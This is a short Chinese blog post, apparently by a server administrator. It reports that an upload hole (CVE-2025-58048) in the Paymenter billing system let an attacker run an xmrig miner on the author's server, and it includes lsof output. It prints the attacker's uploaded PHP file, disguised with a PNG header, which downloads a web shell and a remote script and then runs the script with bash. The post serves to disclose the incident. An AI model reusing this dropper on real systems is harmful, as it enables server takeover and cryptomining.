paymenter财务主机计费系统有上传漏洞

2025-10-10 Linux,虚拟主机 YY.K Permalink

上半年装了一个体验一下丢着一直没管,今天上去发现有挖矿进程。

 

漏洞具体细节:https://cve.imfht.com/detail/CVE-2025-58048

 

root@localhost:/tmp# lsof -p 1479735 
COMMAND     PID      USER   FD      TYPE             DEVICE SIZE/OFF     NODE NAME
xmrig   1479735 paymenter  cwd       DIR              254,3      117 15784149 /home/paymenter/storage/app/public/ticket-attachments
xmrig   1479735 paymenter  rtd       DIR              254,3      298      128 /
xmrig   1479735 paymenter  txt       REG              254,3  8334576 15784153 /home/paymenter/storage/app/public/ticket-attachments/xmrig
xmrig   1479735 paymenter  mem       REG              254,3      561  3231722 /usr/share/zoneinfo/Asia/Shanghai
xmrig   1479735 paymenter  mem       REG               0,14          70684614 anon_inode:[io_uring] (stat: No such file or directory)
xmrig   1479735 paymenter    0r      CHR                1,3      0t0        4 /dev/null
xmrig   1479735 paymenter    1w     FIFO               0,13      0t0 70686037 pipe
xmrig   1479735 paymenter    2w     FIFO               0,13      0t0 70685837 pipe
xmrig   1479735 paymenter    3u  a_inode               0,14        0     1048 [eventpoll:9,11,13,14,15]
xmrig   1479735 paymenter    4u     unix 0x00000000bd7e1641      0t0    26784 type=STREAM (CONNECTED)
xmrig   1479735 paymenter    5u  a_inode               0,14        0 70684614 [io_uring]
xmrig   1479735 paymenter    6r      REG              254,3      215 15784150 /home/paymenter/storage/app/public/ticket-attachments/XBrs38qG8DslCb8cOGWntcvNOceYQsu2AvFiQYDw.php
xmrig   1479735 paymenter    7r     FIFO               0,13      0t0 70684615 pipe
xmrig   1479735 paymenter    8w     FIFO               0,13      0t0 70684615 pipe
xmrig   1479735 paymenter    9r     FIFO               0,13      0t0 70684616 pipe
xmrig   1479735 paymenter   10w     FIFO               0,13      0t0 70684616 pipe
xmrig   1479735 paymenter   11u  a_inode               0,14        0     1048 [eventfd:17]
xmrig   1479735 paymenter   12r      CHR                1,3      0t0        4 /dev/null
xmrig   1479735 paymenter   13u  a_inode               0,14        0     1048 [eventfd:25]
xmrig   1479735 paymenter   14u  a_inode               0,14        0     1048 [eventfd:27]
xmrig   1479735 paymenter   15u     IPv4          102158557      0t0      TCP XXXXXXX:53580->252.104.20.157.sg.kuroit.com:https (ESTABLISHED)
root@localhost:/tmp# cat /home/paymenter/storage/app/public/ticket-attachments/XBrs38qG8DslCb8cOGWntcvNOceYQsu2AvFiQYDw.php
@PNG
<?php 
system("wget https://raw.githubusercontent.com/flozz/p0wny-shell/refs/heads/master/shell.php");
system("wget https://bestvip.pt/storage/ticket-attachments/script.sh");
system("bash script.sh")
 ?>

阅读剩余部分...

paymenter, 财务系统